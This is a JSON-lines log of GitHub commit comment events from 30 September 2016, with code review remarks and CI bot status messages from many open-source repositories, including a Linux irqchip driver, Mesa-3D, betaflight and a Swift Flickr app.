{"id":"4643980757","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19242442,"position":192,"line":192,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T15:03:36Z","updated_at":"2016-09-30T15:03:36Z","body":"Yes this is quite a hack, and there is nothing that can select the initial edge polarity... But it seems we will need to live with it !!"}},"created_at":"2016-09-30T15:03:36Z"}
{"id":"4643981160","type":"CommitCommentEvent","actor":{"login":"davehunt"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":19242443,"position":null,"line":null,"path":null,"commit_id":"e97639bce31c5ae040ab6681fc21f31e796a05e1","created_at":"2016-09-30T15:03:39Z","updated_at":"2016-09-30T15:03:39Z","body":"@lukeis https://docs.travis-ci.com/user/encryption-keys/"}},"created_at":"2016-09-30T15:03:39Z"}
{"id":"4643983724","type":"CommitCommentEvent","actor":{"login":"llbRambo"},"repo":{"name":"llbRambo/Test"},"payload":{"comment":{"id":19242450,"position":null,"line":null,"path":null,"commit_id":"3a1650ad90b271c9f615e141383f5c82edbbe2c1","created_at":"2016-09-30T15:04:05Z","updated_at":"2016-09-30T15:04:05Z","body":"balabalabalabala"}},"created_at":"2016-09-30T15:04:05Z"}
{"id":"4643985880","type":"CommitCommentEvent","actor":{"login":"fidian"},"repo":{"name":"tests-always-included/tomdoc.sh"},"payload":{"comment":{"id":19242458,"position":null,"line":null,"path":null,"commit_id":"8ac79d3011fc740f276cd2b757857b9c8a2050d6","created_at":"2016-09-30T15:04:28Z","updated_at":"2016-09-30T15:04:28Z","body":"I better give that a go on my testing systems.  The unfortunate part is that I have people using Macs and their FreeBSD version of POSIX shells, Ubuntu and its dash, Arch, CentOS 6 and CentOS 7.  Subtle differences make scripting harder.\r\n\r\nI do like the suggestion!  I'm going to add this as an issue so I can track it.  This should hopefully simplify the code and make it faster because it's not shelling out."}},"created_at":"2016-09-30T15:04:28Z"}
{"id":"4643986586","type":"CommitCommentEvent","actor":{"login":"dalbani"},"repo":{"name":"mapproxy/mapproxy"},"payload":{"comment":{"id":19242462,"position":5,"line":29,"path":"mapproxy/cache/path.py","commit_id":"776bbad564a26ced49455c8d94c9b1b75eac2158","created_at":"2016-09-30T15:04:35Z","updated_at":"2016-09-30T15:04:35Z","body":"I think returning `level_location` for `reverse_tms` is not correct, because its path *ends* with the `z` dimension.\r\nThat also somehow brings the question of seeding cleanup with this S3 cache, as implemented in https://github.com/mapproxy/mapproxy/blob/master/mapproxy/seed/cleanup.py#L32."}},"created_at":"2016-09-30T15:04:35Z"}
{"id":"4643989411","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19242470,"position":null,"line":null,"path":null,"commit_id":"f60145d8e491dc1e9bd343d02279b340943e2f48","created_at":"2016-09-30T15:05:02Z","updated_at":"2016-09-30T15:05:02Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#IM_V_ExJTHGbxhnVFgKqQg"}},"created_at":"2016-09-30T15:05:02Z"}
{"id":"4643990917","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19242473,"position":227,"line":227,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T15:05:15Z","updated_at":"2016-09-30T15:05:15Z","body":"The comments are explicit enough, let's see how the maintainers reacts !"}},"created_at":"2016-09-30T15:05:15Z"}
{"id":"4643996620","type":"CommitCommentEvent","actor":{"login":"felixbarny"},"repo":{"name":"stagemonitor/stagemonitor-grafana-elasticsearch"},"payload":{"comment":{"id":19242483,"position":null,"line":null,"path":null,"commit_id":"0609129cab5268203b00b68cafa192d6164a8f61","created_at":"2016-09-30T15:06:10Z","updated_at":"2016-09-30T15:06:10Z","body":"Good catch. Thx for the report!"}},"created_at":"2016-09-30T15:06:10Z"}
{"id":"4644000591","type":"CommitCommentEvent","actor":{"login":"wowharley"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19242493,"position":null,"line":null,"path":null,"commit_id":"d889e5713d537856f2782c62db44059dc9727363","created_at":"2016-09-30T15:06:48Z","updated_at":"2016-09-30T15:06:48Z","body":"# define constAuraEffectPtr std::shared_ptr<const AuraEffect> located in src/server/game/SharedPtrs/SharedPtrs.h line 15\r\n"}},"created_at":"2016-09-30T15:06:48Z"}
{"id":"4644009065","type":"CommitCommentEvent","actor":{"login":"aamirafridi"},"repo":{"name":"tes/redux-plupload"},"payload":{"comment":{"id":19242515,"position":null,"line":null,"path":null,"commit_id":"b15016b48e3d3a9fdd7cd1579726db95bc2910ee","created_at":"2016-09-30T15:08:14Z","updated_at":"2016-09-30T15:08:14Z","body":"@geophree ^"}},"created_at":"2016-09-30T15:08:14Z"}
{"id":"4644009612","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19242516,"position":18,"line":2350,"path":"src/game/Creature.cpp","commit_id":"86ea6ed1f312ccdc27eba14d95fd3ca8889aa892","created_at":"2016-09-30T15:08:20Z","updated_at":"2016-09-30T15:08:20Z","body":"I'm gonna need an answer on this before I move on this, as it sounds wrong to me to return a target we don't even know if we can select, especially since your example completely ignores MeetsSelectAttackingRequirements if no select flags, which seem even more wrong to me...\r\n\r\nGonna need to elaborate here @boxa"}},"created_at":"2016-09-30T15:08:20Z"}
{"id":"4644010360","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19242518,"position":null,"line":null,"path":null,"commit_id":"f4989bce38fe30bbc5814d001d257b833b919e74","created_at":"2016-09-30T15:08:27Z","updated_at":"2016-09-30T15:08:27Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1228](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14732&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:10:49"}},"created_at":"2016-09-30T15:08:27Z"}
{"id":"4644013602","type":"CommitCommentEvent","actor":{"login":"borisbstyle"},"repo":{"name":"betaflight/betaflight"},"payload":{"comment":{"id":19242526,"position":null,"line":null,"path":null,"commit_id":"cab7b562d8dec756d925380162f47a93f1e5e0eb","created_at":"2016-09-30T15:09:01Z","updated_at":"2016-09-30T15:09:01Z","body":"Yeah thats not much. Especially when you put notch at 400hz. Thats where the most problematic full throttle oscillations kick in.\r\n\r\nActually it would be nice to have dynamic coefficients based on throttle."}},"created_at":"2016-09-30T15:09:01Z"}
{"id":"4644014116","type":"CommitCommentEvent","actor":{"login":"nkgwj"},"repo":{"name":"sf-arte/Spica"},"payload":{"comment":{"id":19242527,"position":24,"line":24,"path":"Spica/PhotoData.swift","commit_id":"4b55d097f677e831860c582fbb351ab1fcec1507","created_at":"2016-09-30T15:09:07Z","updated_at":"2016-09-30T15:09:07Z","body":"プロパティ名は小文字で初めてください。\r\nまた、API Design GuidlinesのAcronyms and initialisms 云々のところをご参考ください。\r\n\r\n(largeImageURLでも良い気もします)"}},"created_at":"2016-09-30T15:09:07Z"}
{"id":"4644014986","type":"CommitCommentEvent","actor":{"login":"thallgren"},"repo":{"name":"Yelp/puppet"},"payload":{"comment":{"id":19242530,"position":82,"line":82,"path":"lib/puppet/pops/lookup/interpolation.rb","commit_id":"087312f99e1e45733bec09f5a61f9fa7f1b70874","created_at":"2016-09-30T15:09:16Z","updated_at":"2016-09-30T15:09:16Z","body":"No, it's expected that a lookup that evaluates as the result of evaluating an interpolation expression returns either `nil` or an empty string. If `nil` is returned, then the value is converted to an empty string at line 60. The global_lookup (defined above, at line 67) enforces the empty string default by passing an `''` and `true` as the third and fourth arguments."}},"created_at":"2016-09-30T15:09:16Z"}
{"id":"4644015628","type":"CommitCommentEvent","actor":{"login":"nkgwj"},"repo":{"name":"sf-arte/Spica"},"payload":{"comment":{"id":19242531,"position":28,"line":28,"path":"Spica/PhotoData.swift","commit_id":"4b55d097f677e831860c582fbb351ab1fcec1507","created_at":"2016-09-30T15:09:22Z","updated_at":"2016-09-30T15:09:22Z","body":"同上"}},"created_at":"2016-09-30T15:09:22Z"}
{"id":"4644027401","type":"CommitCommentEvent","actor":{"login":"TheAlphaNerd"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19242556,"position":null,"line":null,"path":null,"commit_id":"96933df2ffa959ab32644314f1573790ebf0a793","created_at":"2016-09-30T15:11:14Z","updated_at":"2016-09-30T15:11:14Z","body":"it was the work of the entire CTC. 😇"}},"created_at":"2016-09-30T15:11:14Z"}
{"id":"4644028247","type":"CommitCommentEvent","actor":{"login":"lmbcosta"},"repo":{"name":"DLMFCUL/sd_projecto1"},"payload":{"comment":{"id":19242560,"position":null,"line":null,"path":null,"commit_id":"aaefa5cae0c3cdb0470544036be3e1d1f155ddf0","created_at":"2016-09-30T15:11:24Z","updated_at":"2016-09-30T15:11:24Z","body":"Meninos depois dêm uma olhada! \r\nQualquer coisa depois até podem escrever aqui\r\n@marcusSDias \r\n@danielfmsantos "}},"created_at":"2016-09-30T15:11:24Z"}
{"id":"4644033967","type":"CommitCommentEvent","actor":{"login":"Feni13"},"repo":{"name":"eramdam/BetterTweetDeck"},"payload":{"comment":{"id":19242573,"position":2,"line":16,"path":"src/css/features/stars.css","commit_id":"de8c54acd7271555496a9f86c6fbe6e78f8c2895","created_at":"2016-09-30T15:12:22Z","updated_at":"2016-09-30T15:12:22Z","body":"src/css/features/stars.css"}},"created_at":"2016-09-30T15:12:22Z"}
{"id":"4644035831","type":"CommitCommentEvent","actor":{"login":"kaysoky"},"repo":{"name":"wjoel/mesos-journald-container-logger"},"payload":{"comment":{"id":19242577,"position":96,"line":96,"path":"src/journald_container_logger.cpp","commit_id":"6e4e16008aa35b3f7a6d8725b7724fb353eab3a7","created_at":"2016-09-30T15:12:41Z","updated_at":"2016-09-30T15:12:41Z","body":"Note: These FDs have a high chance of being leaked unless you `cloexec` them.  \r\n\r\nAnd closing them in the destructor actually close a random FD on the agent process (the logger is destructed when the agent is destructed)."}},"created_at":"2016-09-30T15:12:41Z"}
{"id":"4644044370","type":"CommitCommentEvent","actor":{"login":"serge-404"},"repo":{"name":"serge-404/AltairDOS"},"payload":{"comment":{"id":19242598,"position":null,"line":null,"path":null,"commit_id":"b34a98f4d008be68a3ac0f92fa29cb763e144c42","created_at":"2016-09-30T15:14:08Z","updated_at":"2016-09-30T15:14:08Z","body":"Changes to speedup boot process"}},"created_at":"2016-09-30T15:14:08Z"}
{"id":"4644046727","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19242607,"position":412,"line":412,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T15:14:31Z","updated_at":"2016-09-30T15:14:31Z","body":"This is virtually impossible, and it seems irq_find_host handles null nodes ptrs and fails cleanly"}},"created_at":"2016-09-30T15:14:31Z"}
{"id":"4644046916","type":"CommitCommentEvent","actor":{"login":"siro20"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19242609,"position":83,"line":1472,"path":"src/gallium/state_trackers/nine/nine_ff.c","commit_id":"23c5e39d135638573eb57997efe1d160d53d22b3","created_at":"2016-09-30T15:14:33Z","updated_at":"2016-09-30T15:14:33Z","body":"what's this good for ? it's never used ?"}},"created_at":"2016-09-30T15:14:33Z"}
{"id":"4644047358","type":"CommitCommentEvent","actor":{"login":"saper"},"repo":{"name":"hexmode/SemanticMediaWiki"},"payload":{"comment":{"id":19242610,"position":null,"line":null,"path":null,"commit_id":"11a6f3e9e86312146831657272da1872515651dc","created_at":"2016-09-30T15:14:38Z","updated_at":"2016-09-30T15:14:38Z","body":"Push it to the real master:)"}},"created_at":"2016-09-30T15:14:38Z"}
{"id":"4644051214","type":"CommitCommentEvent","actor":{"login":"bjustin-ibm"},"repo":{"name":"openwhisk/openwhisk"},"payload":{"comment":{"id":19242615,"position":27,"line":128,"path":"core/nodejsActionBase/src/service.js","commit_id":"6bf62df64b1364b8f198d048f7167a204b2f4e63","created_at":"2016-09-30T15:15:17Z","updated_at":"2016-09-30T15:15:17Z","body":"`doInit` currently only has one caller, so changing the return type from a `boolean` to a Promise for a response message only affects the `initCode` function."}},"created_at":"2016-09-30T15:15:17Z"}
{"id":"4644054091","type":"CommitCommentEvent","actor":{"login":"siro20"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19242623,"position":null,"line":null,"path":null,"commit_id":"23c5e39d135638573eb57997efe1d160d53d22b3","created_at":"2016-09-30T15:15:43Z","updated_at":"2016-09-30T15:15:43Z","body":"release ps.rCur in the end ?"}},"created_at":"2016-09-30T15:15:43Z"}
{"id":"4644055868","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19242629,"position":457,"line":457,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T15:16:01Z","updated_at":"2016-09-30T15:16:01Z","body":"Leave the check but remove the \"!= NULL\""}},"created_at":"2016-09-30T15:16:01Z"}
{"id":"4644057299","type":"CommitCommentEvent","actor":{"login":"Kilay"},"repo":{"name":"Kilay/node-http-ntlm"},"payload":{"comment":{"id":19242633,"position":7,"line":76,"path":"httpntlm.js","commit_id":"0cfd6a5aad3be77c8f92cd6b256938c5b768431d","created_at":"2016-09-30T15:16:15Z","updated_at":"2016-09-30T15:16:15Z","body":"Two reasons :\r\n- if I don't return callback, it continue flow and execute ntlm.createType3Message which failed\r\n- i need to intercept the error type in my main app (https://github.com/Kilay/exchanger/blob/f7831d3d1ec21ce6ef45912e452a1d62b14b6df1/index.js#L226) to handle it correctly"}},"created_at":"2016-09-30T15:16:15Z"}
{"id":"4644060353","type":"CommitCommentEvent","actor":{"login":"awikkerink"},"repo":{"name":"Brightspace/eslint-config-brightspace"},"payload":{"comment":{"id":19242637,"position":null,"line":null,"path":null,"commit_id":"0ff551e3898565ecc0fbc18a59db2a2538ec1ae6","created_at":"2016-09-30T15:16:45Z","updated_at":"2016-09-30T15:16:45Z","body":"Doh!"}},"created_at":"2016-09-30T15:16:45Z"}
{"id":"4644063336","type":"CommitCommentEvent","actor":{"login":"vitorcguedes"},"repo":{"name":"vitorcguedes/OlaMundo"},"payload":{"comment":{"id":19242647,"position":null,"line":null,"path":null,"commit_id":"5d4f46496b51b03cb74461875f70e66d730cbb4b","created_at":"2016-09-30T15:17:13Z","updated_at":"2016-09-30T15:17:13Z","body":"Retirado o System.out.print(\"essa parte fui adicionado indevidamente\");  adicionado indevidamente\r\n"}},"created_at":"2016-09-30T15:17:13Z"}
{"id":"4644064114","type":"CommitCommentEvent","actor":{"login":"nkgwj"},"repo":{"name":"sf-arte/Spica"},"payload":{"comment":{"id":19242650,"position":32,"line":32,"path":"Spica/Flickr.swift","commit_id":"1b5584869f242c4100d5d1cc9381dea838dd4760","created_at":"2016-09-30T15:17:21Z","updated_at":"2016-09-30T15:17:21Z","body":"この処理の95行目との違いは何でしょうか"}},"created_at":"2016-09-30T15:17:21Z"}
{"id":"4644064872","type":"CommitCommentEvent","actor":{"login":"ebracho"},"repo":{"name":"ebracho/news"},"payload":{"comment":{"id":19242652,"position":null,"line":null,"path":null,"commit_id":"01a568bbd25c9794ae93ae01e673e1987540b28b","created_at":"2016-09-30T15:17:29Z","updated_at":"2016-09-30T15:17:29Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement React Components](https://trello.com/c/itzvrWdl/8-implement-react-components)"}},"created_at":"2016-09-30T15:17:29Z"}
{"id":"4644066146","type":"CommitCommentEvent","actor":{"login":"NoHaxJustTryHqrd"},"repo":{"name":"iTXTech/Phoenix"},"payload":{"comment":{"id":19242654,"position":null,"line":null,"path":null,"commit_id":"06405dc11533100b036b6e6b160429dbfa88d5eb","created_at":"2016-09-30T15:17:42Z","updated_at":"2016-09-30T15:17:42Z","body":"Oh ok. I understand"}},"created_at":"2016-09-30T15:17:42Z"}
{"id":"4644067164","type":"CommitCommentEvent","actor":{"login":"paby1400"},"repo":{"name":"SimsDewire/ExploringSysOpsServer"},"payload":{"comment":{"id":19242656,"position":null,"line":null,"path":null,"commit_id":"c99024652edbb27866b70f8118b5d90fcaab2058","created_at":"2016-09-30T15:17:52Z","updated_at":"2016-09-30T15:17:52Z","body":"Generalized modules and made the database accessible from outside."}},"created_at":"2016-09-30T15:17:52Z"}
{"id":"4644067749","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"oe-alliance/oe-alliance-settings"},"payload":{"comment":{"id":19242660,"position":null,"line":null,"path":null,"commit_id":"a6943ddfd7a2fc1f31bdce5c228d302936deeb27","created_at":"2016-09-30T15:17:57Z","updated_at":"2016-09-30T15:17:57Z","body":"There' s indeed a bit more to it (delete satellites.xml, verify positions with OE-A version, convert positions when required, maintain several branches of https://github.com/oe-alliance/oe-alliance-core/tree/3.4/meta-oe/recipes-oe-alliance/enigma2-channelsettings ).\r\nBut no need: as has been said the plugin Isetting2 covers it all; more accurate then we ever can achieve on the feeds and with much less hassle. The very reason I deleted more settings in the mean time (see https://github.com/oe-alliance/oe-alliance-settings/commit/cf60d6727c3c9cc207dceb6e364ad63cddf5b0f6 &  https://github.com/oe-alliance/oe-alliance-settings/commit/f4943bce00f3d05abf816e0483670807449c3c40 )."}},"created_at":"2016-09-30T15:17:57Z"}
{"id":"4644069692","type":"CommitCommentEvent","actor":{"login":"ledvinap"},"repo":{"name":"betaflight/betaflight"},"payload":{"comment":{"id":19242662,"position":null,"line":null,"path":null,"commit_id":"cab7b562d8dec756d925380162f47a93f1e5e0eb","created_at":"2016-09-30T15:18:14Z","updated_at":"2016-09-30T15:18:14Z","body":"With 400Hz, delay stays below 1 sample to ~330Hz"}},"created_at":"2016-09-30T15:18:14Z"}
{"id":"4644070045","type":"CommitCommentEvent","actor":{"login":"Eversocial"},"repo":{"name":"Eversocial/eversocial-en"},"payload":{"comment":{"id":19242664,"position":null,"line":null,"path":null,"commit_id":"5f25b66840881a3cfbedf68cfd31fcfc49803731","created_at":"2016-09-30T15:18:18Z","updated_at":"2016-09-30T15:18:18Z","body":"update gh-pages"}},"created_at":"2016-09-30T15:18:18Z"}
{"id":"4644076791","type":"CommitCommentEvent","actor":{"login":"paulcbetts"},"repo":{"name":"Squirrel/Squirrel.Windows"},"payload":{"comment":{"id":19242673,"position":null,"line":null,"path":null,"commit_id":"7b16d6d880ffb0736186bb6a5204926ea8adac09","created_at":"2016-09-30T15:19:25Z","updated_at":"2016-09-30T15:19:25Z","body":"@grandtiger Send me A PR"}},"created_at":"2016-09-30T15:19:25Z"}
{"id":"4644077328","type":"CommitCommentEvent","actor":{"login":"pelikhan"},"repo":{"name":"lancaster-university/microbit-dal"},"payload":{"comment":{"id":19242674,"position":null,"line":null,"path":null,"commit_id":"c95c8e32aece6caf537d47a35f9938ea795ae177","created_at":"2016-09-30T15:19:30Z","updated_at":"2016-09-30T15:19:30Z","body":"Is there any sample/doc for this feature?"}},"created_at":"2016-09-30T15:19:30Z"}
{"id":"4644079274","type":"CommitCommentEvent","actor":{"login":"siro20"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19242680,"position":null,"line":null,"path":null,"commit_id":"4cc44d6d91ee10f5c9f23859f7e828a8f582e498","created_at":"2016-09-30T15:19:49Z","updated_at":"2016-09-30T15:19:49Z","body":"Signed-off-by: Patrick Rudolph <siro@das-labor.org>"}},"created_at":"2016-09-30T15:19:49Z"}
{"id":"4644079282","type":"CommitCommentEvent","actor":{"login":"andyjwalter"},"repo":{"name":"andyjwalter/wadsolent2016"},"payload":{"comment":{"id":19242681,"position":null,"line":null,"path":null,"commit_id":"b9c5173a6a49510e615c2a7150cba67a540925a8","created_at":"2016-09-30T15:19:49Z","updated_at":"2016-09-30T15:19:49Z","body":"good"}},"created_at":"2016-09-30T15:19:49Z"}
{"id":"4644086702","type":"CommitCommentEvent","actor":{"login":"nkgwj"},"repo":{"name":"sf-arte/Spica"},"payload":{"comment":{"id":19242699,"position":30,"line":30,"path":"Spica/Flickr.swift","commit_id":"1b5584869f242c4100d5d1cc9381dea838dd4760","created_at":"2016-09-30T15:21:05Z","updated_at":"2016-09-30T15:21:05Z","body":"何が格納されるものなのか、より説明的な変数名を付けるよう心がけてください。\r\nこの場合は例えばlinesでしょうか？"}},"created_at":"2016-09-30T15:21:05Z"}
{"id":"4644088199","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19242703,"position":52,"line":525,"path":"drivers/pinctrl/meson/pinctrl-meson.c","commit_id":"8c97e26b695f7666879f9e244a145dc01aabbf04","created_at":"2016-09-30T15:21:20Z","updated_at":"2016-09-30T15:21:20Z","body":"Maybe you should check the to_hwirq return before putting it in the fwspec strict"}},"created_at":"2016-09-30T15:21:20Z"}
{"id":"4644090222","type":"CommitCommentEvent","actor":{"login":"ebracho"},"repo":{"name":"ebracho/news"},"payload":{"comment":{"id":19242706,"position":null,"line":null,"path":null,"commit_id":"f7d0d0cf837bfec3f0da1efc7e5d7c12eecfc926","created_at":"2016-09-30T15:21:40Z","updated_at":"2016-09-30T15:21:40Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Move to GitHub Signin](https://trello.com/c/nZW2JNwh/17-move-to-github-signin)"}},"created_at":"2016-09-30T15:21:40Z"}
{"id":"4644092497","type":"CommitCommentEvent","actor":{"login":"tehnerd"},"repo":{"name":"lewislyou/gnl2go"},"payload":{"comment":{"id":19242712,"position":null,"line":null,"path":null,"commit_id":"494cd11208025614bb8bbbe8999f047b06b5b982","created_at":"2016-09-30T15:22:05Z","updated_at":"2016-09-30T15:22:05Z","body":"in your diff you are doing Outpps twice (there is another one below Inpps). Also i have a misspelling for OUTBYTES (in old version it was OYTBYTES). you will need to fix it as well (or to merge from upstream)"}},"created_at":"2016-09-30T15:22:05Z"}
{"id":"4644092677","type":"CommitCommentEvent","actor":{"login":"pseudom"},"repo":{"name":"ezpaarse-project/ezpaarse"},"payload":{"comment":{"id":19242714,"position":null,"line":null,"path":null,"commit_id":"412b478ce3d95fc5277be25557f9e0a8b8a197d0","created_at":"2016-09-30T15:22:07Z","updated_at":"2016-09-30T15:22:07Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Solutionner le souci d'installation bower](https://trello.com/c/aLDdgXDO/115-solutionner-le-souci-d-installation-bower)"}},"created_at":"2016-09-30T15:22:07Z"}
{"id":"4644094175","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19242715,"position":null,"line":null,"path":null,"commit_id":"59cf396f7be65c4e5384efd563ea30cd7fa673a3","created_at":"2016-09-30T15:22:22Z","updated_at":"2016-09-30T15:22:22Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1229](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14742&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-30T15:22:22Z"}
{"id":"4644097196","type":"CommitCommentEvent","actor":{"login":"rgbkrk"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19242722,"position":null,"line":null,"path":null,"commit_id":"96933df2ffa959ab32644314f1573790ebf0a793","created_at":"2016-09-30T15:22:50Z","updated_at":"2016-09-30T15:22:50Z","body":":bow: _Thank you entire CTC_"}},"created_at":"2016-09-30T15:22:50Z"}
{"id":"4644098146","type":"CommitCommentEvent","actor":{"login":"pseudom"},"repo":{"name":"ezpaarse-project/ezpaarse"},"payload":{"comment":{"id":19242725,"position":null,"line":null,"path":null,"commit_id":"45cccad4eb7d2dc1ebbac24a6694c806ba6048ed","created_at":"2016-09-30T15:23:00Z","updated_at":"2016-09-30T15:23:00Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Solutionner le souci d'installation bower](https://trello.com/c/aLDdgXDO/115-solutionner-le-souci-d-installation-bower)"}},"created_at":"2016-09-30T15:23:00Z"}
{"id":"4644098241","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"barsoom/review"},"payload":{"comment":{"id":19242726,"position":14,"line":14,"path":"lib/review/authentication.ex","commit_id":"ca31e088e5eb649e005364c8309287441a1d87ad","created_at":"2016-09-30T15:23:01Z","updated_at":"2016-09-30T15:23:01Z","body":"It could be improved. I’ve built this on the assumption that no config means that it’s public, but maybe it should be locked down by default."}},"created_at":"2016-09-30T15:23:01Z"}
{"id":"4644101657","type":"CommitCommentEvent","actor":{"login":"nkgwj"},"repo":{"name":"sf-arte/Spica"},"payload":{"comment":{"id":19242743,"position":35,"line":35,"path":"Spica/Flickr.swift","commit_id":"1b5584869f242c4100d5d1cc9381dea838dd4760","created_at":"2016-09-30T15:23:34Z","updated_at":"2016-09-30T15:23:34Z","body":"ptrが使われていませんが、そのような関心の無い変数名については _ で受けた方がいいかと思います。\r\n\r\nまた、この処理は、\r\nlet lines = str.components(separatedBy: CharacterSet.newlines) \r\nのような感じで書くことはできますでしょうか。"}},"created_at":"2016-09-30T15:23:34Z"}
{"id":"4644103921","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19242747,"position":null,"line":null,"path":null,"commit_id":"f83299c2d5136cd7bc9a2616233f89229ea2df87","created_at":"2016-09-30T15:23:56Z","updated_at":"2016-09-30T15:23:56Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/33771/testReport/) for this commit**"}},"created_at":"2016-09-30T15:23:56Z"}
{"id":"4644104765","type":"CommitCommentEvent","actor":{"login":"keymone"},"repo":{"name":"Yelp/puppet"},"payload":{"comment":{"id":19242748,"position":82,"line":82,"path":"lib/puppet/pops/lookup/interpolation.rb","commit_id":"087312f99e1e45733bec09f5a61f9fa7f1b70874","created_at":"2016-09-30T15:24:05Z","updated_at":"2016-09-30T15:24:05Z","body":"do i understand it correctly, that undefined variables always evaluate to empty strings inside data provider interpolation? sorry maybe i'm missing something"}},"created_at":"2016-09-30T15:24:05Z"}
{"id":"4644104979","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19242751,"position":10,"line":0,"path":"libraries/stdlib/src/kotlin/util/KotlinVersion.kt","commit_id":"5e70ebede1a0993dd2d5b2ae03ee6c73062dc652","created_at":"2016-09-30T15:24:07Z","updated_at":"2016-09-30T15:24:07Z","body":"|`line 22`|\n|---|\nI mean the integer representation of the same version could be different among different stdlib versions. that's why it shouldn't be persisted. On the opposite the string representation of the same version isn't supposed to change: \"1.1.0\" will always mean 1.1.0"}},"created_at":"2016-09-30T15:24:07Z"}
{"id":"4644110739","type":"CommitCommentEvent","actor":{"login":"rsterbin"},"repo":{"name":"rsterbin/liturgicalendar"},"payload":{"comment":{"id":19242763,"position":6,"line":11,"path":"database/migrations/20160810135105_stmarys_moveable_feasts.sql","commit_id":"234a963263af534ff5d31c3c2ebea7af782753c5","created_at":"2016-09-30T15:25:05Z","updated_at":"2016-09-30T15:25:05Z","body":"No worries!  I'm happy someone's actually finding this useful. :)"}},"created_at":"2016-09-30T15:25:05Z"}
{"id":"4644112285","type":"CommitCommentEvent","actor":{"login":"singliang"},"repo":{"name":"singliang/onethink_xbkc"},"payload":{"comment":{"id":19242766,"position":null,"line":null,"path":null,"commit_id":"71287f8e65dac03eec20e3c806fdef672d308ea6","created_at":"2016-09-30T15:25:20Z","updated_at":"2016-09-30T15:25:20Z","body":"说明更新"}},"created_at":"2016-09-30T15:25:20Z"}
{"id":"4644120872","type":"CommitCommentEvent","actor":{"login":"nkgwj"},"repo":{"name":"sf-arte/Spica"},"payload":{"comment":{"id":19242782,"position":83,"line":83,"path":"Spica/Flickr.swift","commit_id":"1b5584869f242c4100d5d1cc9381dea838dd4760","created_at":"2016-09-30T15:26:47Z","updated_at":"2016-09-30T15:26:47Z","body":"parやoauthに変えずにparams、oauthSwiftで受ける(guard let params=params ~ )のが標準的な作法かと思います。"}},"created_at":"2016-09-30T15:26:47Z"}
{"id":"4644124073","type":"CommitCommentEvent","actor":{"login":"siro20"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19242789,"position":null,"line":null,"path":null,"commit_id":"b9d14773ba17fb65e9f25f5f79f1b3130de51816","created_at":"2016-09-30T15:27:19Z","updated_at":"2016-09-30T15:27:19Z","body":"Signed-off-by: Patrick Rudolph <siro@das-labor.org>"}},"created_at":"2016-09-30T15:27:19Z"}
{"id":"4644124860","type":"CommitCommentEvent","actor":{"login":"Dmitry-Me"},"repo":{"name":"danmar/cppcheck"},"payload":{"comment":{"id":19242794,"position":18,"line":1444,"path":"lib/tokenize.cpp","commit_id":"659263802205de68eee3b987d9a5710faa337e38","created_at":"2016-09-30T15:27:27Z","updated_at":"2016-09-30T15:27:27Z","body":"@danmar Reporting a false positive in VC++? LOL"}},"created_at":"2016-09-30T15:27:27Z"}
